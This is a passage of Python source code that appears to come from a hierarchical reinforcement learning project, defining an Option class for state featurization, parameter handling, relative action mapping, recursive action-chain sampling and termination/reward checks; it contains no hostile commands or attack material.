discretize_actions\r\nfrom tianshou.data import Batch, ReplayBuffer, to_torch_as, to_numpy\r\nfrom file_management import suppress_stdout_stderr\r\n\r\nINPUT_STATE = 0\r\nOUTPUT_STATE = 1\r\nPARAM_STATE = 2\r\nPARAM_NOINPUT_STATE = 3\r\nNO_PARAM_STATE = 4\r\nONLY_RELATIVE_STATE = 5\r\n\r\nFULL = 0\r\nFEATURIZED = 1\r\nDIFF = 2\r\n\r\n\r\nclass Option():\r\n def __init__(self, 
policy_reward, models, object_name, temp_ext=False, relative_actions = -1, relative_state=False, relative_param=0, \r\n discretize_acts=False, device=-1, param_first=False, no_input=False):\r\n '''\r\n policy_reward is a PolicyReward object, which contains the necessary components to run a policy\r\n models is a tuple of dataset model and environment model\r\n featurizers is Featurizers object, which contains the object name, the gamma features, the delta features, and a vector representing which features are contingent\r\n '''\r\n if policy_reward is not None:\r\n self.assign_policy_reward(policy_reward)\r\n else:\r\n self.discrete_actions = False\r\n if discretize_acts: # forces discrete actions\r\n self.discrete_actions = True \r\n self.assign_models(models)\r\n self.assign_featurizers()\r\n self.object_name = object_name\r\n print(\"init option\", self.object_name)\r\n self.action_shape = (1,) # should be set in subclass\r\n self.action_prob_shape = (1,) # should be set in subclass\r\n self.output_prob_shape = (1,) # set in subclass\r\n self.control_max = None # set in subclass, maximum values for the parameter\r\n self.action_max = None # set in subclass, the limits for actions that can be taken\r\n self.action_space = None # set in subclass, the space object corresponding to all of the above information\r\n self.relative_action_space = None # set in subclass, space object used to set actions relative to current position\r\n self.relative_actions = relative_actions > 0\r\n self.relative_state = relative_state\r\n self.relative_param = relative_param\r\n self.range_limiter = relative_actions\r\n self.discrete = False\r\n self.iscuda = False\r\n self.device = device\r\n self.use_mask = True\r\n self.param_process = None # must be assigned externally\r\n inp_set = PARAM_NOINPUT_STATE if no_input == 1 else (NO_PARAM_STATE if no_input == 2 else (ONLY_RELATIVE_STATE if no_input == 3 else PARAM_STATE))\r\n print(no_input, inp_set)\r\n # define different settings for get_state, a tuple of (form, inp, rel, param_rel)\r\n print(self.relative_state, self.relative_param)\r\n self.input_setting = (FEATURIZED, inp_set, int(self.relative_state), int(self.relative_param))\r\n self.inter_setting = (FEATURIZED, INPUT_STATE, 0, 0)\r\n self.output_setting = (FEATURIZED, OUTPUT_STATE, 0, 0)\r\n self.full_flat_setting = (FULL, 0,0,0)\r\n\r\n self.last_factor = self.get_state(setting=self.output_setting)\r\n self.last_act = None\r\n self.policy_batch = None # the policy batch for previous\r\n\r\n self.discretize_actions = discretize_acts # convert a continuous state into a discrete one\r\n # print(self.get_state(form=0))\r\n self.param_first = param_first\r\n self.inter_shape = self.get_state(setting=self.inter_setting).shape if not no_input else (0,)\r\n self.output_shape = self.get_state(setting=self.output_setting).shape\r\n self.object_shape = self.dataset_model.object_dim\r\n self.rel_shape = (0,) if not self.relative_state else self.get_relative(inp=INPUT_STATE).shape\r\n self.param_rel_shape = (0,) if not self.relative_param else self.output_shape\r\n print(self.get_state(setting=self.full_flat_setting))\r\n if self.sampler:\r\n self.param, self.mask = self.sampler.sample(self.get_state(setting=self.full_flat_setting))\r\n print(self.param)\r\n self.param_shape = self.param.shape\r\n else:\r\n self.param_shape = self.inter_shape\r\n self.param, self.mask = np.array([1]), np.array([1])\r\n print(self.inter_shape, self.output_shape, self.param_shape)\r\n self.input_shape = 
self.get_state(setting=self.input_setting).shape\r\n self.first_obj_shape = self.inter_shape[0] - self.output_shape[0] + self.param_shape[0] # TODO: assumes the output as part of the input\r\n \r\n\r\n\r\n # print(\"last_factor\", self.last_factor)\r\n # parameters for temporal extension TODO: move this to a single function\r\n self.temp_ext = temp_ext \r\n self.last_action = None\r\n self.terminated = True\r\n self.time_cutoff = -1 # time for ending the episode\r\n self.terminate_cutoff = -1 # cutoff for termination\r\n self.terminate_timer = 0 # tracking for terminating the current option parameter\r\n self.timer = 0 # tracking for end of episode\r\n self.resample_timer = 0 # tracking when the last resample was\r\n self.reward_timer = 0 # a hack to reduce the frequency of rewards\r\n self.reward_freq = 13\r\n\r\n def assign_models(self, models):\r\n self.dataset_model, self.environment_model, self.sampler = models\r\n\r\n def assign_policy_reward(self, policy_reward):\r\n self.policy = policy_reward.policy\r\n self.done_model = policy_reward.done_model\r\n self.termination = policy_reward.termination\r\n self.reward = policy_reward.reward # the reward function for this option\r\n self.next_option = policy_reward.next_option\r\n if self.next_option is not None:\r\n print(\"next option\", self.next_option.object_name, self.next_option.discrete)\r\n self.discrete_actions = self.next_option.discrete # the action space might be discrete even if the parameter space is continuous\r\n\r\n def assign_featurizers(self):\r\n self.gamma_featurizer = self.dataset_model.gamma\r\n self.delta_featurizer = self.dataset_model.delta\r\n self.contingent_input = self.dataset_model.controllable\r\n\r\n def set_device(self, device_no):\r\n device = 'cpu' if not self.iscuda else 'cuda:' + str(device_no)\r\n if self.policy is not None:\r\n self.policy.to(device)\r\n if self.dataset_model is not None:\r\n self.dataset_model.to(device)\r\n if self.next_option is not None:\r\n self.next_option.set_device(device_no)\r\n\r\n def cuda(self):\r\n self.iscuda = True\r\n if self.policy is not None:\r\n self.policy.cuda()\r\n if self.dataset_model is not None:\r\n self.dataset_model.cuda()\r\n if self.next_option is not None:\r\n self.next_option.cuda()\r\n\r\n def cpu(self):\r\n self.iscuda = False\r\n if self.policy is not None:\r\n self.policy.cpu()\r\n if self.dataset_model is not None:\r\n self.dataset_model.cpu()\r\n if self.next_option is not None:\r\n self.next_option.cpu()\r\n\r\n\r\n def get_relative(self, flat = None, factored=None, full_state=None, inp=0):\r\n state = flat\r\n if flat is None:\r\n if factored is None:\r\n if full_state is None:\r\n full_state = self.environment_model.get_state()\r\n factored_state = full_state['factored_state']\r\n flat = self.environment_model.flatten_factored_state(factored_state, instanced=True)\r\n base_shape = np.array(factored_state[list(factored_state.keys())[0]]).shape\r\n n_unsqueeze = len(base_shape) - 1\r\n for _ in range(n_unsqueeze):\r\n flat = np.expand_dims(flat, 0)\r\n state = flat\r\n else:\r\n state = factored\r\n featurize = self.gamma_featurizer if (inp == 0 or inp == 2 or inp == 3) else self.delta_featurizer\r\n rel = featurize.get_relative(state) # there might be some difficulty managing concatenate for relative state\r\n return rel\r\n \r\n # def get_flattened_input_state(self, factored_state):\r\n # return pytorch_model.wrap(self.environment_model.get_flattened_state(names=self.names), cuda=self.iscuda)\r\n def get_state(self, full_state=None, setting = 
(1,0,0,0), param=None, factored=False): # param is expected \r\n # form is an enumerator, 0 is flattened state, 1 is gamma/delta state, 2 is diff using last_factor\r\n # inp indicates if gamma or delta or gamma+param (if param is not None)\r\n # param can either be None (add a dummy param), a list of the same length as full_state, or a param dimensional numpy array\r\n # factored indicates if the state should NOT be flattened because only the factored components are given\r\n form, inp, rel, param_rel = setting\r\n if full_state is None:\r\n full_state = self.environment_model.get_state()\r\n if type(full_state) is list or type(full_state) is np.ndarray:\r\n # if type(param) is list or type(param) is np.ndarray:\r\n # return np.array([self.get_single_state(f, form=form, inp=inp, param=p) for f,p in zip(full_state, param)])\r\n if param is not None:\r\n return np.array([self.get_single_state(f, form=form, inp=inp, rel=rel, param_rel=param_rel, param=param.copy(), factored=factored) for f in full_state])\r\n return np.array([self.get_single_state(f, form=form, inp=inp, rel=rel, param_rel=param_rel, param=param, factored=factored) for f in full_state])\r\n else: # assume it is a dict\r\n return self.get_single_state(full_state, form=form, inp=inp, rel=rel, param_rel=param_rel, param=param, factored=factored)\r\n\r\n def get_single_state(self, full_state, form=1, inp=0, rel= 0, param_rel=0, param=None, factored=False):\r\n # print(full_state)\r\n factored_state = full_state['factored_state']\r\n featurize = self.gamma_featurizer if (inp == 0 or inp == 2) else self.delta_featurizer\r\n comb_param = lambda x: self.add_param(x, param) if (inp == 2 or inp == 3) else x\r\n\r\n if form == 0:\r\n return self.environment_model.flatten_factored_state(factored_state, instanced=True)\r\n elif form == 1:\r\n '''\r\n concatenation occurs in the order: relative, param, gamma, param\r\n '''\r\n # if inp == 2:\r\n # print(featurize(self.environment_model.flatten_factored_state(factored_state, instanced=True)), param)\r\n # print(\"getting combined\", comb_param(featurize(self.environment_model.flatten_factored_state(factored_state, instanced=True))))\r\n base_shape = np.array(factored_state[list(factored_state.keys())[0]]).shape\r\n n_unsqueeze = len(base_shape) - 1\r\n if not factored:\r\n flat = self.environment_model.flatten_factored_state(factored_state, instanced=True)\r\n # print(\"flat\", flat.shape, n_unsqueeze, base_shape, factored_state[\"Ball\"])\r\n for _ in range(n_unsqueeze):\r\n flat = np.expand_dims(flat, 0)\r\n if inp == 3 or inp == 5:\r\n if len(base_shape) == 1:\r\n state = comb_param(np.zeros((0,)))\r\n else:\r\n state = comb_param(np.zeros((base_shape[0],0,)))\r\n else:\r\n if factored:\r\n state = comb_param(featurize(factored_state))\r\n else:\r\n # flat = self.environment_model.flatten_factored_state(factored_state, instanced=True)\r\n # # print(\"flat\", flat.shape, n_unsqueeze, base_shape, factored_state[\"Ball\"])\r\n # for _ in range(n_unsqueeze):\r\n # flat = np.expand_dims(flat, 0)\r\n state = comb_param(featurize(flat))\r\n # print(state.shape)\r\n # print(\"cat param\", state.shape, rel)\r\n if rel == 1:\r\n if factored:\r\n rel = self.get_relative(factored=factored_state, inp=inp)\r\n else:\r\n rel = self.get_relative(flat=flat, inp=inp) # there might be some difficulty managing concatenate for relative state\r\n if len(state.shape) == 1:\r\n state = np.concatenate((rel, state), axis=0)\r\n else:\r\n state = np.concatenate((rel, state), axis=1)\r\n if param_rel > 0: # TODO: 
add mask to relative param\r\n # print(factored_state)\r\n if factored:\r\n os = self.delta_featurizer(factored_state)\r\n else:\r\n os = self.delta_featurizer(flat)\r\n # print(os, param)\r\n param = self.handle_param(os, param)\r\n param_rel = os - param\r\n if len(state.shape) == 1:\r\n # print(state.shape, param_rel.shape)\r\n state = np.concatenate((param_rel, state), axis=0)\r\n else:\r\n state = np.concatenate((param_rel, state), axis=1)\r\n # print(\"cat rel\", rel.shape, state.shape)\r\n return state\r\n else:\r\n return self.delta_featurizer(self.environment_model.flatten_factored_state(factored_state, instanced=True)) - self.last_factor\r\n\r\n def strip_param(self, combined):\r\n '''\r\n TODO: only handles stripping concatenated state with one dimension\r\n TODO: name is slightly confusing, strips BOTH param and relative states\r\n '''\r\n if self.param_process is None: # param process is not none would mean that the environment handles things like this\r\n if len(combined.shape) > 1:\r\n if self.param_first:\r\n return combined[:, self.param_shape[0]:]\r\n return combined[:, self.rel_shape[0] + self.param_rel_shape[0]:self.inter_shape[0] + self.rel_shape[0] + self.param_rel_shape[0]]\r\n if self.param_first:\r\n return combined[self.param_shape[0]:]\r\n return combined[self.rel_shape[0] + self.param_rel_shape[0]:self.inter_shape[0] + self.rel_shape[0] + self.param_rel_shape[0]]\r\n return combined\r\n\r\n def assign_param(self, state, param, obj_state=None):\r\n '''\r\n similar to add_param, but for a state which is already added\r\n TODO: assumes that param_process is an inplace operation\r\n '''\r\n if len(param.shape) != len(state.shape): # assume that state is batch and param is single\r\n param = np.stack([param.copy() for i in range(state.shape[0])], axis=0)\r\n if self.param_process is None:\r\n # print(state.shape, param.shape, self.inter_shape, self.rel_shape, self.relative_state)\r\n inter_rel = self.inter_shape[0] + self.rel_shape[0]\r\n prel = self.param_rel_shape[0]\r\n if len(state.shape) == 1:\r\n if self.param_first: # param is at the beginning\r\n state[:self.param_shape[0]] = param\r\n inter_rel += self.param_shape[0]\r\n else: # param is at the end\r\n state[inter_rel + prel:] = param\r\n if self.param_rel_shape[0] > 0 and obj_state is not None:\r\n state[inter_rel:inter_rel + prel] = obj_state - param \r\n else:\r\n if self.param_first:\r\n state[:, :self.param_shape[0]] = param\r\n inter_rel += self.param_shape[0]\r\n else:\r\n state[:, self.inter_shape[0] + self.rel_shape[0] + self.param_rel_shape[0]:] = param # default to was concatenated\r\n if self.param_rel_shape[0] > 0 and obj_state is not None:\r\n state[:, inter_rel:inter_rel + prel] = obj_state - param \r\n else:\r\n state = self.param_process(state, param)\r\n return state\r\n\r\n def handle_param(self, state, param):\r\n if param is None: # insert a dummy param\r\n param = np.zeros(self.param_shape)\r\n if len(param.shape) != len(state.shape): # assume that state is batch and param is single\r\n param = np.stack([param.copy() for i in range(state.shape[0])], axis=0)\r\n return param \r\n\r\n def add_param(self, state, param):\r\n '''\r\n only handles single states and batches\r\n '''\r\n param = self.handle_param(state, param)\r\n # if param is None: # insert a dummy param\r\n # param = np.zeros(self.param_shape)\r\n # if len(param.shape) != len(state.shape): # assume that state is batch and param is single\r\n # param = np.stack([param.copy() for i in range(state.shape[0])], axis=0)\r\n if 
self.param_process is None:\r\n if len(state.shape) == 1:\r\n param_process = lambda x,y: np.concatenate((x,y), axis=0)\r\n else:\r\n param_process = lambda x,y: np.concatenate((x,y), axis=1) # default to concatenate\r\n else:\r\n param_process = self.param_process\r\n if self.param_first:\r\n return param_process(param, state)\r\n return param_process(state, param)\r\n\r\n def get_param(self, full_state, last_terminate, force=False):\r\n # print(self.timer, last_terminate)\r\n new_param = False\r\n if last_terminate or self.timer == 0 or force or self.terminate_timer == self.terminate_cutoff:\r\n # print(\"resample\")\r\n self.terminate_timer = 0\r\n if self.object_name == 'Raw': # raw param handling is questionable at best\r\n self.param, self.mask = np.array([1]), np.array([1])\r\n else: \r\n self.param, self.mask = self.sampler.sample(self.get_state(full_state, setting=self.full_flat_setting))\r\n self.terminate_timer = 0\r\n new_param = True\r\n # print(self.param, self.get_state(full_state, form=FEATURIZED, inp=OUTPUT_STATE))\r\n self.param, self.mask = pytorch_model.unwrap(self.param), pytorch_model.unwrap(self.mask)\r\n # print(self.timer, self.time_cutoff, self.param, self.get_state(full_state, form=FEATURIZED, inp=OUTPUT_STATE))\r\n return self.param, self.mask, new_param\r\n\r\n def convert_param(self, param): # TODO: only handles single params at a time\r\n if self.discrete:\r\n if type(param) == np.ndarray: param = int(param.squeeze())\r\n if type(param) == torch.tensor: param = param.squeeze().long()\r\n return self.get_possible_parameters()[param][0]\r\n else:\r\n if self.object_name == \"Action\":\r\n mask = self.action_mask\r\n else:\r\n mask = self.dataset_model.get_active_mask()\r\n new_param = (mask.copy())\r\n param = param.squeeze()\r\n # print(mask, new_param, param)\r\n new_param[new_param == 1] = param\r\n param = new_param\r\n return param\r\n\r\n def convert_relative_action(self, state, act):\r\n # print(\"act\", act)\r\n if self.relative_actions:\r\n new_act = list()\r\n for a, cfs in zip(act, self.next_option.dataset_model.cfselectors):\r\n cfs.feature_selector(state) + a\r\n new_act.append(min(cfs.feature_range[1], max(cfs.feature_range[0], (cfs.feature_selector(state) + a).squeeze()))) # add the action, then constrain to the range\r\n # print(\"new_act\", new_act, cfs.feature_selector(state), a, cfs.feature_range)\r\n return np.array(new_act)\r\n return new_act\r\n\r\n def reverse_relative_action(self, state, act):\r\n # print(\"act\", act)\r\n new_act = list()\r\n for a, cfs in zip(act, self.next_option.dataset_model.cfselectors):\r\n new_act.append(cfs.feature_selector(state) - a)\r\n # new_act.append(min(cfs.feature_range[1], max(cfs.feature_range[0], (cfs.feature_selector(state) + a).squeeze()))) # add the action, then constrain to the range\r\n # print(\"new_act\", new_act, cfs.feature_selector(state), a, cfs.feature_range)\r\n return np.array(new_act)\r\n\r\n\r\n def map_action(self, act, resampled, batch):\r\n if self.discretize_actions: # if actions are discretized, then converts discrete action to continuous\r\n act = self.get_cont(act)\r\n act = self.policy.map_action(act) # usually converts from policy space to environment space (even for options)\r\n if self.relative_actions and self.next_option is not None and self.next_option.object_name != \"Action\": # converts relative actions maintaining value\r\n if resampled:\r\n act = self.convert_relative_action(self.next_option.get_state(batch[\"full_state\"], setting=self.full_flat_setting), act)\r\n 
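For reference, the clamp-to-feature-range pattern used by `convert_relative_action` above, restated as a self-contained function. The flat `state`/`feature_ranges` arguments here stand in for the repo's `cfselectors`, which are not shown in this excerpt:

import numpy as np

def apply_relative_action(state, act, feature_ranges):
    """Add a relative action to the current feature values, clamped per feature.

    state: current values of the controllable features, shape (k,)
    act: relative offsets, shape (k,)
    feature_ranges: list of (low, high) pairs, one per feature (hypothetical stand-in for cfselectors)
    """
    new_act = []
    for value, offset, (low, high) in zip(state, act, feature_ranges):
        # add the offset, then constrain to the legal range, as in convert_relative_action
        new_act.append(min(high, max(low, value + offset)))
    return np.array(new_act)

# e.g. a feature at 2.0 asked to move +1.5 inside the range [0, 3] saturates at 3:
print(apply_relative_action(np.array([2.0]), np.array([1.5]), [(0.0, 3.0)]))  # [3.]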
self.last_mapped_act = act\r\n        else:\r\n            act = self.last_mapped_act # otherwise we get a moving target problem\r\n        return act\r\n\r\n    def reverse_map_action(self, mapped_act, batch):\r\n        if self.relative_actions and self.next_option is not None and self.next_option.object_name != \"Action\": # converts relative actions maintaining value\r\n            mapped_act = self.reverse_relative_action(self.next_option.get_state(batch[\"full_state\"], setting=self.full_flat_setting), mapped_act)\r\n        act = self.policy.reverse_map_action(mapped_act) # usually converts from environment space back to policy space (even for options)\r\n        if self.discretize_actions: # if actions are discretized, convert the continuous action back to its discrete index\r\n            act = self.get_discrete(act)\r\n        return act\r\n\r\n\r\n    def sample_action_chain(self, batch, state_chain, random=False, force=False, use_model=False, preserve=False): # TODO: change this to match the TS parameter format, in particular, make sure that forward returns the desired components in RLOutput\r\n        '''\r\n        takes in a tianshou.data.Batch object and param, and runs the policy on it\r\n        the batch object can only contain a single full state (computes one state at a time), because of handling issues\r\n        use_model is only for model based search\r\n        if the batch object contains a partial flag (key with PARTIAL=1), then treat the state as a partial\r\n        '''\r\n        # compute policy information for next state\r\n        # input_state = self.get_state(state, form=FEATURIZED, inp=INPUT_STATE)\r\n\r\n        resampled = True\r\n        # if self.object_name == \"Ball\":\r\n        #     print(\"resample_check\", not (self.timer % self.temp_ext == 0 and self.timer != 0), # using temporal extension\r\n        #     (self.timer), # temporal extension timer elapsed\r\n        #     (self.next_option is not None and not self.next_option.terminated), # waiting for next option termination \r\n        #     not force) # forces a new action\r\n\r\n        # print(self.object_name, self.next_option.terminated)\r\n        factored = False # This is really only used for the model based method\r\n        # print(batch)\r\n        if \"PARTIAL\" in batch[\"full_state\"] and batch[\"full_state\"][\"PARTIAL\"] == 1:\r\n            # print(\"using factored\")\r\n            factored = True\r\n        if preserve or (self.temp_ext > 0 and # preserve forces the last action to be reused; otherwise temporal extension must be enabled\r\n            (not (self.resample_timer == self.temp_ext)) and # temporal extension timer not yet elapsed\r\n            (self.next_option is not None and not self.next_option.terminated) # waiting for next option termination \r\n            and not force): # forces a new action\r\n            # if self.object_name == \"Block\":\r\n            #     print(\"last action\", self.object_name, type(self.last_act), self.last_action)\r\n            act = self.last_act # the act is the discrete index of the action, while the mapped action is the parameterized form used as the next option's parameter\r\n            mapped_act = self.last_action\r\n            if state_chain is None: state = None\r\n            else: state = state_chain[-1] \r\n            policy_batch = self.policy_batch\r\n            resampled = False\r\n        elif random:\r\n            # if self.relative_actions and self.next_option is not None and self.next_option.object_name != \"Action\": # only on higher level options\r\n            #     act = self.relative_action_space.sample()\r\n            #     act = self.convert_relative_action(self.next_option.get_state(batch[\"full_state\"], form=0, inp=1), act)\r\n            # else:\r\n            act = self.policy_action_space.sample()\r\n            if hasattr(self, \"expand_policy_space\") and self.expand_policy_space and (type(act) == np.int64 or type(act) == int):\r\n                act = np.array([act])\r\n            # if self.policy\r\n            policy_batch = None\r\n            
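The `if preserve or (...)` gate above is the heart of temporal extension: the option repeats its previous action until its resample window elapses, its sub-option terminates, or a resample is forced. A standalone restatement of that predicate, with field names shortened from the attributes used above:

def keep_last_action(preserve, temp_ext, resample_timer, child_terminated, force):
    """True when the option should repeat its previous action (temporal extension)."""
    return preserve or (
        temp_ext > 0                      # temporal extension is enabled
        and resample_timer != temp_ext    # the extension window has not elapsed
        and not child_terminated          # the lower option is still running
        and not force                     # no resample was forced by the caller
    )

assert keep_last_action(False, 3, 1, False, False)       # mid-window: repeat
assert not keep_last_action(False, 3, 3, False, False)   # window elapsed: resample
assert not keep_last_action(False, 3, 1, True, False)    # child terminated: resample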
state = None\r\n mapped_act = self.map_action(act, resampled, batch)\r\n # if self.object_name == \"Block\":\r\n # print(\"random\", self.object_name, type(act), mapped_act)\r\n # print(\"random action\", mapped_act)\r\n else:\r\n # batch['obs'] = self.get_state(batch['full_state'], form=FEATURIZED, inp=INPUT_STATE)\r\n # batch['next_obs'] = self.get_state(batch['next_full_state'], form=FEATURIZED, inp=INPUT_STATE) if 'next_full_state' in batch else None\r\n # print(self.object_name, self.iscuda)\r\n # print(batch)\r\n if state_chain is None: policy_batch = self.policy.forward(batch, None)\r\n else: policy_batch = self.policy.forward(batch, state_chain[-1]) # uncomment this\r\n state = policy_batch['state']\r\n act = policy_batch.act\r\n act = to_numpy(act)\r\n # print(\"prenoise\", act)\r\n act = self.policy.exploration_noise(act, batch)\r\n act = act[0]\r\n # print(self.object_name, batch.obs, batch.obs_next, batch.param, act, mapped_act, self.convert_relative_action(self.next_option.get_state(batch[\"full_state\"], form=0, inp=1), act) if self.relative_actions and self.next_option is not None and self.next_option.object_name != \"Action\" else 0)\r\n # print(self.object_name, batch.obs, act)\r\n # print(\"relative\", act)\r\n if hasattr(self, \"expand_policy_space\") and self.expand_policy_space and (type(act) == np.int64 or type(act) == int):\r\n # print(\"expanding\")\r\n act = np.array([act])\r\n # print(type(act), act)\r\n mapped_act = self.map_action(act, resampled, batch)\r\n if self.object_name == \"Block\":\r\n print(act, mapped_act)\r\n # if self.object_name == \"Block\":\r\n # print(\"policy action\", self.object_name, type(act), mapped_act)\r\n if use_model: \r\n self.last_act = act # the baction is the discrete index of the action, where the action is the parameterized form that is a parameter\r\n self.last_action = mapped_act\r\n self.policy_batch = policy_batch\r\n act, mapped_act = self.search(batch, state_chain, act, mapped_act) # only this line differs from the main\r\n if resampled: self.resample_timer = 0\r\n # print(self.iscuda, param, baction, action)\r\n # print(act, random, mapped_act)\r\n # print(\"output actions\", act, mapped_act)\r\n chain = [mapped_act]\r\n \r\n # recursively propagate action up the chain\r\n if self.next_option is not None:\r\n param = batch['param']\r\n obs = batch['obs']\r\n param_act = self.next_option.convert_param(mapped_act)\r\n batch['param'] = [param_act]\r\n if self.next_option.object_name != \"Action\": batch['obs'] = self.next_option.get_state(batch[\"full_state\"], setting=self.next_option.input_setting, param=param_act, factored=factored) # will always concatenate param\r\n # print(\"params\", self.next_option.object_name, batch.param, param_act, param, batch.obs)\r\n # print(self.next_option.object_name, batch.obs)\r\n if state_chain is None: next_policy_act, rem_chain, result, rem_state_chain, last_resampled = self.next_option.sample_action_chain(batch, None) # , random=random # TODO: only sample top level randomly\r\n else: next_policy_act, rem_chain, result, rem_state_chain, last_resampled = self.next_option.sample_action_chain(batch, state_chain[:-1], force=resampled) # , random=random # TODO: only sample top level randomly, if we resampled make sure not to temporally extend the next layer\r\n chain = rem_chain + chain\r\n state = rem_state_chain + [state]\r\n batch['param'] = param\r\n batch['obs'] = obs\r\n self.policy_batch = policy_batch\r\n self.last_act = act\r\n # print(act, self.last_act, self.last_action)\r\n 
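The block above is where `sample_action_chain` recurses: this option's mapped action becomes the `param` of the next option down, and the per-level actions are collected bottom-up into `chain`. A toy version of that recursion; `ToyOption` and its one-line `act` are invented purely for illustration:

class ToyOption:
    def __init__(self, name, child=None):
        self.name, self.child = name, child

    def act(self, obs, param):
        # hypothetical one-line "policy": tag the incoming param with this level's name
        return f"{self.name}({param})"

def sample_chain(option, obs):
    """Each level's action becomes the next level's parameter; chain is bottom-up."""
    chain, param = [], None
    while option is not None:
        action = option.act(obs, param)
        chain.append(action)
        param, option = action, option.child
    return chain[::-1]  # primitive action first, like `rem_chain + chain` above

top = ToyOption("ball", child=ToyOption("paddle"))
print(sample_chain(top, obs=None))  # ['paddle(ball(None))', 'ball(None)']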
return act, chain, policy_batch, state, resampled\r\n\r\n def step(self, last_state, chain):\r\n # This can only be called once per time step because the state diffs are managed here\r\n if self.next_option is not None:\r\n self.next_option.step(last_state, chain[:len(chain)-1])\r\n self.last_action = chain[-1]\r\n self.last_factor = self.get_state(last_state, setting=self.output_setting)\r\n\r\n def step_timer(self, done): # TODO: does this need to handle done chains?\r\n # return true if the timer ellapsed\r\n self.timer += 1\r\n self.resample_timer += 1\r\n self.terminate_timer += 1\r\n # print(done, self.timer)\r\n if done or (self.timer == self.time_cutoff and self.time_cutoff > 0): # all timers reset if end of episode\r\n self.timer = 0\r\n self.terminate_timer = 0\r\n self.resample_timer = 0\r\n return self.timer == self.time_cutoff and self.time_cutoff > 0\r\n return False\r\n\r\n def terminate_reward(self, state, next_state, param, chain, mask=None, needs_reward=True):\r\n # recursively get all of the dones and rewards\r\n if self.next_option is not None: # lower levels should have masks the same as the active mask( fully trained)\r\n last_dones, last_rewards, last_termination = self.next_option.terminate_reward(state, next_state, self.next_option.convert_param(chain[-1]), chain[:len(chain)-1], needs_reward=False)\r\n # get the state to be entered into the termination check\r\n input_state = self.get_state(state, setting=self.inter_setting)\r\n object_state = self.get_state(next_state, setting=self.output_setting)\r\n # object_state = self.get_state(state, form = DIFF if self.data.use_diff else FEATURIZED, inp=OUTPUT_STATE) # don't predict diff state\r\n # if mask is None:\r\n # mask = self.dataset_model.get_active_mask()\r\n\r\n # assign terminated, done and reward ( might need to unwrap)\r\n # print(\"first\", object_state.shape, self.mask, param, input_state.shape)\r\n # print(self.environment_model.get_done(state), self.environment_model.get_done(next_state))\r\n # print(self.mask)\r\n termination = self.termination.check(input_state, object_state, param, self.mask, self.environment_model.get_done(next_state))\r\n # print(\"reward fn\", self.reward)\r\n if needs_reward:\r\n reward = self.reward.get_reward(input_state, object_state, param, self.mask, self.environment_model.get_reward(next_state))\r\n else:\r\n reward = 0\r\n self.terminated = termination\r\n self.done = self.done_model.check(termination, self.timer, self.environment_model.get_done(next_state))\r\n # print(\"checking\", termination, self.timer, self.done, self.termination.epsilon, self.object_name, self.termination.inter, self.termination.inter_pred)\r\n # done = op_done\r\n # # environment termination overrides\r\n # if self.environment_model.get_done(next_state):\r\n # # print(\"true_termination\")\r\n # done = True\r\n # # print(self.environment_model.get_done(state), done)\r\n # # manage a maximum time duration to run an option, NOT used, quietly switches option\r\n # if self.time_cutoff > 0:\r\n # if self.timer == self.time_cutoff - 1:\r\n # # print(\"timer termination\")\r\n # done = True\r\n dones = last_dones + [self.done]\r\n rewards = last_rewards + [reward]\r\n terminations = last_termination + [termination]\r\n # print(self.object_name, done, op_done, reward, object_state, param)\r\n return dones, rewards, terminations\r\n\r\n def tensor_state(self, factored_state): #TODO: this doesn't really belong here\r\n # might need to copy factored state\r\n for k in factored_state.keys():\r\n factored_state[k] 
= pytorch_model.wrap(factored_state[k], cuda = self.iscuda)\r\n if len(factored_state[k].shape) > 1: # flattens only up to one extra dimension\r\n factored_state[k] = factored_state[k][0]\r\n return factored_state\r\n\r\n def np_state(self, factored_state): #TODO: this doesn't really belong here\r\n for k in factored_state.keys():\r\n factored_state[k] = pytorch_model.unwrap(factored_state[k])\r\n if len(factored_state[k].shape) > 1: # flattens only up to one extra dimension\r\n factored_state[k] = factored_state[k][0]\r\n return factored_state\r\n\r\n\r\n def predict_state(self, factored_state, raw_action):\r\n # predict the next factored state given the action chain\r\n # This is different only at the primitive-option level, where the state of the Action is used from the environment model\r\n factored_state = self.tensor_state(factored_state)\r\n inters, new_factored_state = self.next_option.predict_state(factored_state, raw_action)\r\n if self.next_option.object_name == \"Action\": # special handling of actions, which are evaluated IN BETWEEN states\r\n factored_state[\"Action\"] = new_factored_state[\"Action\"] \r\n inter, next_state = self.dataset_model.predict_next_state(factored_state) # uses the mean, no variance\r\n return inters + [inter], {**new_factored_state, **{self.object_name: next_state}}\r\n\r\n\r\n # def record_state(self, state, next_state, action_chain, rl_outputs, param, rewards, dones):\r\n # if self.next_option is not None:\r\n # self.next_option.record_state(state, next_state, action_chain[:-1], rl_outputs[:-1], action_chain[-1], rewards[:-1], dones[:-1])\r\n # self.rollouts.append(**self.get_state_dict(state, next_state, action_chain, rl_outputs, param, rewards, dones))\r\n\r\n # def get_state_dict(self, state, next_state, action_chain, rl_outputs, param, rewards, dones, terminations): # also used in HER\r\n # return {'state': self.get_state(state, form=FEATURIZED, inp=INPUT_STATE),\r\n # 'next_state': self.get_state(next_state, form=FEATURIZED, inp=INPUT_STATE),\r\n # 'object_state': self.get_state(state, form=FEATURIZED, inp=OUTPUT_STATE),\r\n # 'next_object_state': self.get_state(next_state, form=FEATURIZED, inp=OUTPUT_STATE),\r\n # 'state_diff': self.get_state(state, form=DIFF, inp=OUTPUT_STATE), \r\n # 'true_action': action_chain[0],\r\n # 'true_reward': rewards[0],\r\n # 'true_done': dones[0],\r\n # 'action': action_chain[-1],\r\n # 'probs': rl_outputs[-1].probs[0],\r\n # 'Q_vals': rl_outputs[-1].Q_vals[0],\r\n # 'param': param, \r\n # 'mask': self.dataset_model.get_active_mask(), \r\n # 'termination': terminations[-1], \r\n # 'reward': rewards[-1], \r\n # 'done': dones[-1]}\r\n\r\n\r\n def get_input_state(self, state = None): # gets the state used for the forward model/policy\r\n if state is not None:\r\n input_state = self.gamma_featurizer(self.pytorch_model.wrap(environment_model.get_flattened_state(), cuda=args.cuda))\r\n else:\r\n input_state = self.gamma_featurizer(self.pytorch_model.wrap(environment_model.flatten_factored_state(state)))\r\n return input_state\r\n\r\n def forward(self, state, param): # runs the policy and gets the RL output\r\n return self.policy(state, param)\r\n\r\n def compute_return(self, gamma, start_at, num_update, next_value, return_max = 20, return_form=\"value\"):\r\n return self.rollouts.compute_return(gamma, start_at, num_update, next_value, return_max = 20, return_form=\"value\")\r\n\r\n # def set_behavior_epsilon(self, epsilon):\r\n # self.behavior_policy.epsilon = epsilon\r\n\r\n\r\n def save(self, save_dir, 
